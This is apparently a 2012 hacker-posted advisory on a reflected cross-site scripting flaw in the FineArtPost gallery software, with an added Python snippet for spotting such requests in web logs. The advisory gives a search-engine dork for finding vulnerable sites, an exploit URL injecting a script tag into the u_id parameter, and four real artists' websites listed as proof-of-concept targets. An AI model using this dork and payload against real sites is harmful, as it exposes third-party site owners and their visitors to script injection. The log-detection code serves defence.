FineArtPost suffers from a cross-site scripting vulnerability.
99868fa03684b7957f38f4998b7dd0fa5d9f3a046484e69595f2690f7bd7ec49
FineArtPost XSS ( Cross Site Scripting ) Vulnerability
Software : FineArtPost
Date : 7/1/2012
Vendor : http://www.fineartpost.com/
Get App. : http://www.fineartpost.com/about_fap/pricing.php
Beta : http://www.fineartpost.com/fap2/beta.php
Price : $149.59
Dork : inurl:"/display_images.php?u_id=" "FineArtPost"
Author : ITTIHACK
Home : http://ittihack.com
Vulnerable file : display_images.php
Exploit : http://site/path/display_images.php?u_id=<script>alert(2012)</script>
Proof of concept:
http://www.greslearthart.com/public/display_images.php?u_id=<script>alert(2012)</script>
http://www.clairecolemanart.com/public/display_images.php?u_id=<script>alert(2012)</script>
http://www.annrutecki.com/public/display_images.php?u_id=<script>alert(2012)</script>
http://www.fineartpost.com/harmon/public/display_images.php?u_id=<script>alert(2012)</script>
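For defenders checking web server logs for this issue, the following added example (not part of the original advisory) flags requests to display_images.php whose u_id value is not a plain number after repeated percent-decoding. The numeric-only rule for u_id, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines; IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jan/2012:10:00:01 +0000] "GET /public/display_images.php?u_id=17 HTTP/1.1" 200 5120
203.0.113.9 - - [07/Jan/2012:10:00:07 +0000] "GET /public/display_images.php?u_id=%3Cscript%3Ealert(2012)%3C/script%3E HTTP/1.1" 200 4880
203.0.113.9 - - [07/Jan/2012:10:00:09 +0000] "GET /public/display_images.php?u_id=%253Cscript%253Ealert(2012)%253C%252Fscript%253E HTTP/1.1" 200 4880
198.51.100.2 - - [07/Jan/2012:10:01:00 +0000] "GET /public/index.php?u_id=%3Cb%3E HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded markup is also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_u_id_requests(log_text):
    """Return (line_number, decoded_u_id) for non-numeric u_id values
    sent to display_images.php."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/display_images.php"):
            continue
        values = parse_qs(target.query, keep_blank_values=True).get("u_id", [])
        for raw in values:
            value = fully_decode(raw)
            # Assumption: a legitimate u_id consists of ASCII digits only.
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for lineno, value in suspicious_u_id_requests(SAMPLE_LOG):
        print(f"line {lineno}: suspicious u_id = {value!r}")
```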
#Greetz to: Reinie